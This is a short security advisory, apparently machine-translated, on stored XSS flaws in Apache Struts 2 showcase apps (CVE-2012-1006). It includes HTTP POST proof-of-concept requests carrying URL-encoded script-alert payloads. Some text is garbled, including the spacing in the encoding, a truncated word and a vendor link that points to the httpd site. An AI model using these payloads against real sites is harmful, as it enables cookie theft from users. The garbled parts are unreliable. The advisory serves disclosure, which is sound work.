Release date:
Updated on:
Affected Systems:
Apache Group Struts 2.2.3
Apache Group Struts 2.0.14
Description:
--------------------------------------------------------------------------------
Bugtraq id: 51902
Cve id: CVE-2012-1006
Apache Struts is an open-source web application framework for developing Java Web applications.
Apache Struts has multiple HTML Injection Vulnerabilities. Attackers can exploit these vulnerabilities to run HTML and script code in affected browsers to steal Cookie authentication creden。 or control the appearance of websites.
<* Source: Antu Sanadi
Link: http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Antu Sanadi () provides the following test methods:
POC 1:
-----
Stored XSS
POST struts2-showcase/person/editPerson. action HTTP/1.1
Host: SERVER_IP: 8080
User-Agent: struts2-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Post Data:
----------
Persons % 281% 29. name = % 3 Cscript % 3 Ealert % 28% 22SecPod-XSS-TEST % 22% 29% 3C % 2 Fscript
% 3E & persons % 281% 29. lastName = % 3 Cscript % 3 Ealert % 28% 22SecPod-XSS-TEST % 22% 29% 3C % 2
Fscript % 3E & method % 3 Asave = Save + all + persons
POC 2:
-----
Stored XSS
POST/struts2-rest-showcase/orders HTTP/1.1
Host: SERVER_IP: 8080
User-Agent: struts2-rest-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Apache Group
------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://httpd.apache.org/